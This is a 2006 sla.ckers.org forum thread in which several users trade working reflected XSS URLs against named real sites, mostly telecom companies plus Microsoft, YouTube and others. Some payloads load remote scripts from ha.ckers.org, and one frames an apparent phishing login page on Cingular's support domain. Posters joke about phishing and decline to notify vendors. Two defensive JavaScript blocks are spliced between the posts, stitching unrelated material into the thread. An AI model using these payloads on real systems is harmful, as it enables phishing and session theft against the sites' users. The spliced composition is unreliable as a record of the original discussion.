Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: maluc
Date: September 23, 2006 03:31PM

http://www.comcast.net/signin.jsp?redirectUrl=%22><script>alert(%22XSS%22)</script><b%20

as you can tell from the url.. i was actually looking for redirects, but xss is always a bonus ^^

-maluc

Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:21PM

https://www.em.avnet.com/sts/home/0%2C11497%2CRID%3D0&CID%3D32209&CCD%3DUSA&SID%3D0&DID%3DDF2&LID%3D0&BID%3DDF2&CTP%3DSTS%2C00.html?ACD=1&UID='%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:27PM

This is a pretty good example of jumping out of encapsulation while in a JavaScript function: http://www.microsoft.com/mac/resources/templates.aspx?pid=templates&browser=1&app=&group=&category=&template=%22;alert(%22XSS%22);//

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:41PM

Is it goon-line or go-online? The world may never know: http://goonline.seeq.com/seeq/int_results.jsp?portal_id=1&domain=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&tag=fdsa&keyword=blah

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 23, 2006 11:50PM

heh, a very phishable find..
and coincidentally, the last javascript string escaping i posted was from their partners in ineptitude http://sla.ckers.org/forum/read.php?3,44,727#msg-727

-maluc

Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:52PM

This is very similar to the Microsoft one: http://www.vh1.com/search/search.jhtml?searchterm=%22;alert(%22XSS%22);//&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:55PM

Same vein... I'm on a roll tonight... so I guess this proves that removing < and > isn't the be all end all: http://www.mtv.com/search/index.jhtml?searchterm=%22);alert(%22XSS%22);//&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 24, 2006 12:09AM

http://www.ask.com/webprefs?o=0&l=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 24, 2006 12:13AM

http://search.about.com/fullsearch.htm?terms=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 24, 2006 12:16AM

Hmm... actually looks like all their cnames are vulnerable too... You know this is the exact reason I loathe about.com... it tries to be everything to everyone and therefore spam all the search engines. Now everything is vulnerable: http://math.about.com/od/mathjokes/index.htm?terms=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/SCRIPT%3E

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 09/24/2006 12:17AM by rsnake.

Re: So it begins
Posted by: maluc
Date: September 24, 2006 12:29AM

lol.. you're certainly on a roll .. and yes, about.com seems to try and have half an answer to everything you need =.=''

http://search.comcast.net/?q=%3Cscript+src%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2Fscript%3E&cat=Images&con=net&x=0&y=0

-maluc

Re: So it begins
Posted by: maluc
Date: September 24, 2006 12:36AM

http://www22.verizon.com/Search/Results/?SearchText=%27+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29+onmouseover%3D%27alert%28%22XSS%22%29%27+b&x=14&y=10&box=1&QueryText=%27+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29+onmouseover%3D%27alert%28%22XSS%22%29%27+b&Coll1=1&Coll=Enterprise%2C+Federal%2C+Wholesale%2C+Corporate+Information%2C+LearningCorner&Coll2=home_products%2C+home_support%2C+business_products%2C+business_support&site=&ps=1&om=1&cs=1&checkall=&resultspage=firstpage&ResultStart=1&ResultCount=3&statechoice=ALL&cmd=new&kb=&from=1

onmouseover the 'Search for' box.. unless you use firefox

-maluc

Re: So it begins
Posted by: maluc
Date: September 24, 2006 12:58AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://business.verizonwireless.com/b2b/jsp/popups/optin.jsp&email=xss'><script>alert('XSS')</script><b%20 business.verizonwireless.com

-maluc

Re: So it begins
Posted by: maluc
Date: September 24, 2006 01:02AM

http://search.t-mobile.com/inquiraapp/ui.jsp?ui_mode=question&question_box=Is%20This%20Vulnerable?%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

maybe i should get into the phishing business.. it just seems too easy _-_

-maluc

Re: So it begins
Posted by: maluc
Date: September 24, 2006 01:11AM

http://supportcingular.atgnow.com/cng/resultDisplay.do?page=http%3A%2F%2Fha.ckers.org/images/stallowned.jpg&result=9&responseid=bfd397882facb4d9%3A35998f%3A10dde0404b3%3A3c92&groupid=1&contextid=10261%3A849.980&clusterName=CingularCluster&doctype=1000&excerpt=Download+the+fix+from%3A+http%3A%2F%2Fwww.google.com%2Fdownloads%2Fdetails.aspx%3FFamilyID%3D17d997d2-5034-4bbb-b74d-ad8430a1f7c8%26DisplayLang%3Den#Goto849

so this is not really XSS.. but it's amusing. auto-defacer

Edit: it seems you need a sessionid first.. so click twice

-maluc



Edited 1 time(s). Last edit at 09/24/2006 05:56AM by maluc.

Re: So it begins
Posted by: maluc
Date: September 24, 2006 01:32AM

http://www.cingular.com/sbc/other_databases/locator/storeLocator?link=cingnew_map&var20=http%3A%2F%2Fwww.cingular.com&var21=&sqlcol1=INTERNET_FLAG&sqlcnd1=%3D&sqlval1=%27Y%27&streetaddress=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&city=maluc&state=NY&zip=10308&queryRadius=5&submit.x=19&submit.y=2

cingular took longer than the others.. so good job to them

-maluc

Re: So it begins
Posted by: maluc
Date: September 24, 2006 04:19AM

again because i was bored.. http://onlinecare.cingular.com/support/knowledgeBase.do?content=%68tt%70%3a%2f/cingular%2ego%2edyndns%2e%6frg/accountverify.html
feel free to login..

This isn't arbitrary XSS, only iframe injection solely from the link: content=http://evil.com .. but it is a good example to show that an injection under /support/ can be quite damaging from phishing - even when just an iframe.

This one is particularly well suited for phishing, since the domain still stays as onlinecare.cingular.com (not so with redirects) .. and the URL is short (long hex encoded strings look suspicious) and the rest of the site is functional and convincing

hopefully, for their sake, they fix it soon - although i'm too lazy to notify them.

-maluc

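A defender-side counterpart to the iframe injection maluc describes above (an added example, not code from the thread or from the site named in it): the link hides the scheme as %68tt%70%3a, so a check that only looks for a literal "http:" in the raw query string misses it. The example validates the content parameter after URL decoding and parsing, requiring same origin and an allowlisted path prefix; the origin, the prefixes and the sample query strings are assumptions made up for illustration, and it runs under Node.js.

```javascript
// Added example (not from the thread): validate a "content" parameter that a
// support page turns into an iframe src. Decisions are made on the parsed,
// decoded URL, never on the raw query string. Node.js, no dependencies.

const SITE_ORIGIN = 'https://support.example.com';          // assumption
const ALLOWED_PREFIXES = ['/support/kb/', '/support/faq/'];   // assumption

// Returns true only for a same-origin URL under an allowlisted path.
function isSafeContentParam(raw) {
  let url;
  let path;
  try {
    // A bare path resolves against the site; an absolute URL, however it was
    // percent-encoded before decoding, keeps its own origin and is rejected.
    url = new URL(raw, SITE_ORIGIN);
    path = decodeURIComponent(url.pathname); // throws on malformed %xx
  } catch (e) {
    return false;
  }
  // Rejects http://host/..., //host/..., javascript: and data: (origin "null").
  if (url.origin !== SITE_ORIGIN) return false;
  // The parser has already collapsed ../ segments; a leftover literal ".."
  // means a dot segment reached us percent-encoded, so refuse it outright.
  if (path.includes('..')) return false;
  return ALLOWED_PREFIXES.some((prefix) => path.startsWith(prefix));
}

// Applies the check to one request's query string. URLSearchParams performs
// the percent-decoding, which is exactly where %68tt%70%3a turns into http:.
function checkRequest(queryString) {
  const content = new URLSearchParams(queryString).get('content');
  return content !== null && isSafeContentParam(content);
}
```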
Re: So it begins
Posted by: maluc
Date: September 24, 2006 04:26AM

http://www1.sprintpcs.com/learn/form_public_question.jsp?bmForm=sendEmail&bmFormID=1159089875101&bmUID=1159089875101&bmIsForm=true&bmPrevTemplate=learn%2Fform_public_question.jsp&bmText=EMAIL_QUESTION%3C%3EfName&bmRequired=EMAIL_QUESTION%3C%3EfName&EMAIL_QUESTION%3C%3EfName=&bmText=EMAIL_QUESTION%3C%3ElName&bmRequired=EMAIL_QUESTION%3C%3ElName&EMAIL_QUESTION%3C%3ElName=&bmText=EMAIL_QUESTION%3C%3EcontactNo&bmRequired=EMAIL_QUESTION%3C%3EcontactNo&EMAIL_QUESTION%3C%3EcontactNo=&bmText=EMAIL_QUESTION%3C%3EemailUs&bmRequired=EMAIL_QUESTION%3C%3EemailUs&EMAIL_QUESTION%3C%3EemailUs=&bmSingle=EMAIL_QUESTION%3C%3Etopic&EMAIL_QUESTION%3C%3Etopic=&bmText=EMAIL_QUESTION%3C%3Etext_area&EMAIL_QUESTION%3C%3Etext_area=XSS+Goes+Here%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&bmText=charCountMeter&charCountMeter=1147&bmImage=submit.x&bmImage=submit.y&submit.x=33&submit.y=12&bmFields=bmForm%2CbmFormID%2CbmUID%2CbmIsForm%2CbmPrevTemplate%2CbmText%2CbmRequired%2CbmSingle%2CbmImage&bmHash=bfdeb512638bba6615437a7e4aacdbd04e5ae756

no wonder HP can get phone records so easily _-_

Edit: Again, needs token first .. might be a way to use session fixation on some of them.. i'll check on it later

-maluc



Edited 1 time(s). Last edit at 09/24/2006 05:59AM by maluc.

Re: So it begins
Posted by: maluc
Date: September 24, 2006 04:46AM

here's another good example for injecting inside script tags.. http://www.vodafone.com/site_search_results/0,3062,CATEGORY_ID%253D200%2526LANGUAGE_ID%253D0%2526CONTENT_ID%253D0,00.html?section=all&company=all&KWD=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+&submitButton=%C2%BB

the filter correctly encodes special characters to unusable but displayable forms.. but inside javascript, it escapes double quotations to \" .. which does nothing to prevent you from prematurely ending a string.

However, it also translates } into | .. just to be a pain. and prevents anyone from ending the if(null=null) { blah; | statement. Thus the need for a new set of script tags

\";</script><script>alert('XSS');</script><b

-maluc

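The breakout maluc describes here, and the earlier Microsoft, VH1 and MTV links in this thread, all come down to what an encoder for the JavaScript string context has to do. The following is an added example, not code from the thread or from any site named in it: it models the filter as described in the post (quote to \", } to |), a correct encoder for the same context, and a check that tells the two apart. It assumes the page emits the parameter as var kwd = "..." inside a script element and runs under Node.js.

```javascript
// Added example (not from the thread): contrast the filter described in the
// post with a proper encoder for the JavaScript string context. Node.js only.

// Weak filter as described: " becomes \" and } becomes |, nothing else.
function weakFilter(s) {
  return String(s).replace(/"/g, '\\"').replace(/}/g, '|');
}

// Encoder for data placed inside a JS string literal within <script>.
// Every risky character becomes a \xHH or \uHHHH escape. Backslash is in the
// set, so a user-supplied \ cannot swallow the escape added for a following
// quote, and < > / are encoded so the data can never spell </script>.
function encodeForJsString(s) {
  return String(s).replace(/[\\"'<>\/&\r\n\u2028\u2029]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Assumed page template: the search term lands in var kwd = "...".
const PREFIX = '<script>var kwd = "';
const SUFFIX = '";</script>';
function render(encoder, input) {
  return PREFIX + encoder(input) + SUFFIX;
}

// Defender check on the rendered fragment: does the inserted data contain a
// live quote (one preceded by an even number of backslashes) or a </script?
function breaksOut(html) {
  const body = html.slice(PREFIX.length, html.length - SUFFIX.length);
  const liveQuote = /(^|[^\\])(\\\\)*"/.test(body);
  const closesScript = /<\/script/i.test(body);
  return liveQuote || closesScript;
}

// What a browser's JS parser reads back from the encoded literal.
function decodeAsJs(encoded) {
  return new Function('return "' + encoded + '";')();
}

// Constructed input in the shape of the payload quoted in the post.
const SAMPLE = '\\";</script><script>alert(\'XSS\');</script><b';
```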
Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:10AM

http://www.chinaunicom.com/search/search.jsp?s_con=I%20Have%3Cscript%3Ealert('XSS')%3C/script%3E%20no%20idea%20how%20to%20read%20mandarin no filters

-maluc

Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:22AM

http://buscador.telefonica.es/jsp/index.jsp?QUERYSTRING=&NOMLIB=telefonica%7Ctelefonicacom%7Cgrupo_telefonicaonline%7Cgrupo_Telefonicamoviles%7Cgrupo_telefonicadata%7Cgrupo_telefonicamedia%7Cgrupo_cabitel%7Cgrupo_fundaciontelefonica%7Cgrupo_telefonicaid%7Cgrupo_telefonicacable%7Cgrupo_terra%7C&QUERYTYPE=1&QUERYLEVEL=2&DOFRAME=YES&NRESULT=10&PAG=DORESULT&PAGINA=0&FILEINI=&SALADEPRENSA=&IDIOM=&QUERYTXT=a'><script>alert('XSS');</script><b no filters

-maluc

Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:30AM

http://www.orange.com/francais/search/default.asp?qt=maluc%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&ref=form&nh=100&postback=true&col=frhtml no filters .. big french cell phone company, if you're american and don't know them

-maluc

Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:52AM

http://www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/programView.do?string=a%22></iframe><script>alert(%22XSS%22)</script><b&Submit=&saveResults=true&saveResults=true&logDebug=true&indexName=TELECOM&lang=ENGLISH&encoding=UTF-8&abstractLength=300&hitsPerSet=10&startSet=1&LANG=EN&tabId=0&pageTypeId=9535&channelId=-8661&programId=27833&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&BV_UseBVCookie=Yes it looks like you first need a session id before this'll work .. (i.e. click the link twice)

no filters.. breaking out of iframe

and i'm exhausted now.. so i'll finish the rest of the top 15 phone companies tomorrow ... http://en.wikipedia.org/wiki/List_of_mobile_network_operators

-maluc


btw RSnake: the link compactor is quite sensitive about unencoded quotations like in: http://www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/programView.do?string=a"></iframe><script>alert("XSS")</script><b&Submit=&saveResults=true&saveResults=true&logDebug=true&indexName=TELECOM&lang=ENGLISH&encoding=UTF-8&abstractLength=300&hitsPerSet=10&startSet=1&LANG=EN&tabId=0&pageTypeId=9535&channelId=-8661&programId=27833&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&BV_UseBVCookie=Yes

Re: So it begins
Posted by: digi7al64
Date: September 24, 2006 07:45AM

damn guys, it's getting to be quite a xss competition here.

http://www.mapquest.com/maps/map.adp?cat=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fweird%2Fstallowned.js%3E%3C%2Fscript

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.travelodge.com/Travelodge/control/Booking/search_results&destination=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E&Submit=Submit << http://www.travelodge.com

http://www.reference.com/search?q=';%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E

http://www.information.com/search/index.html?cat=1&keyword=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 09/24/2006 08:27AM by digi7al64.

Re: So it begins
Posted by: WhiteAcid
Date: September 24, 2006 12:42PM

http://www.youtube.com/results?&search_query=&search_sort='%3E%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: tecklord
Date: September 24, 2006 01:28PM

XSS at many popular web sites :)
http://www.securitylab.ru/blog/tecklord/?category=19

Re: So it begins
Posted by: maluc
Date: September 24, 2006 02:01PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.telenor.com.pk/careers/Jobs.php?&CV_ID=XSS%27%3C&password=a<script>alert(String.fromCharCode(88,83,83))</script>&Submit2=++Sign+In++ telenor.com.pk .. a large norwegian mobile service provider that i've never heard of. .com.pk is their pakistan domain though

They filter most of their site.. but let their SQL errors spit back unfiltered input
There may be an SQL injection in a couple places of their site too.. but i fail at sql stuff :/

-maluc

Re: So it begins
Posted by: Kyran
Date: September 24, 2006 04:42PM

rsnake, could you copy the stallowned.js to ckers.org?
And possibly rename it to 1.js or something similar?

Better for obfuscation as well as my poor memory. :P

- Kyran

Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:24PM

http://www.teliadk.idlesurf.net/cgi-bin/search.pl?lang_intrf=da&query=asdf%27%3Balert%28%27XSS%27%29%3Bt+%3D%27&x=0&y=0&qtype=and

another cell phone service provider .. .dk = their denmark version

http://se.ext.telia.newjobs.com/login.asp?redirect=h%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20 their job search site.. i don't speak swedish, so not sure if this is a general job site or telia only _-_

http://192.89.232.139/jobs/frmAdSearch.asp?JOBCITY=&JOBUNIT=&JOBTYPE=&JOBFUN=&JOBFUN_SUB=&JOBFUNCTION=&FREE_TEXT=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&JOBSORT=AD_EXT_CDATE&TOP_10=0&L=1 their finnish site, i'm not sure why they don't use a domain name..

http://webbguide.telia.se/redirect.jsp?rid=-1&type=FRONTWEB_INFO_FTG&url=http://nabegr32b.cocolog-nifty.com/wonderfulgr32/images/caterham_seven_csr260.jpg yes i know this is a redirect.. but they were related so i included it here..

-maluc



Edited 3 time(s). Last edit at 09/24/2006 05:54PM by maluc.

Re: So it begins
Posted by: maluc
Date: September 24, 2006 06:24PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://home.singtel.com/customer_service/cust_serv_emailus.asp&salutation_=&name_=XSS1%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cb%20&nature_of_feedback_=&contact_number_=XSS2%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cb%20&email_=XSS3%22%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cb%20&commenting_on_=&your_comments_=XSS4</textarea><script>alert(%22XSS4%22)</script> home.singtel.com

singapore cell phone service company .. no filtering - 3 input tags breakout, and 1 textarea breakout

Well my unscientific and non-exhaustive survey found that at least 12 of the biggest 17 (70%) cell phone service companies have XSS holes ripe for phishing.. sad indeed :T

-maluc



Edited 1 time(s). Last edit at 09/24/2006 06:53PM by maluc.
